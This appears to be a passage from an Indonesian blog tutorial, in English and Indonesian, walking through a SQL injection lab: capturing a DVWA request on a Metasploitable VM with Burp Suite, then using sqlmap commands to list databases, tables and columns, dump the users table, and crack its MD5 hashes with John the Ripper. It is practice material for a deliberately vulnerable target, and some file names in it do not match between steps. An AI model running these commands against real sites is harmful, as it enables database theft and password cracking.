http://192.168.56.100/dvwa enter
(Gunakan Metasploitable pada virtualbox yang akan kita buat sbg target. Browsing dvwa dengan menggunakan IP target)
2.Open burpsutie to see the result submit proxy of target which we see through sql injection. Submit the url of target and look up the result in the Burpssuite and copy to file.
(Buka burpsuite untuk melihat hasil proxy yg telah kita lihat melalui sql injection.Masukan alamat url ke kotak submit dan hasil kopi di burpsuite di kopi)
3.Open the terminal and using the command.
#sqlmap -l /root/nama file enter
#sqlmap -l /root/bukapassword.txt enter
4.Using the command to get the database of target.
#sqlmap -l /root/bukapassword.txt --dbs enter
5.Using command to get the tables one of data base namely dvwa.
#sqlmap -l /root/bukapassword.txt -D dvwa --tables
6.After we find the table, let to see the columns of dvwa.
#sqlmap -l /root/bukapassword.txt/ -D dvwa --columns
7.We select the user in dvwa. Use the command up to get the crack of password result.
# sqlmap -l /root/bukapassword.txt -D dvwa -T users --dump
8.We open the password of user in dvwa with John. Open new terminal to make the cript of user password.Copy the sript password from the terminal previously.
#nano isipassword.py enter
(file isipassword.py ini kita buat sendiri sbg file yang menyimpan perintah script password user yg kita kopi sebulumnya)
9.Then copy password that existed at the previous terminal
10.Now we use the command to open the password with John
#john --format=raw-md5 isipassword.txt --show
Tidak ada komentar:
Posting Komentar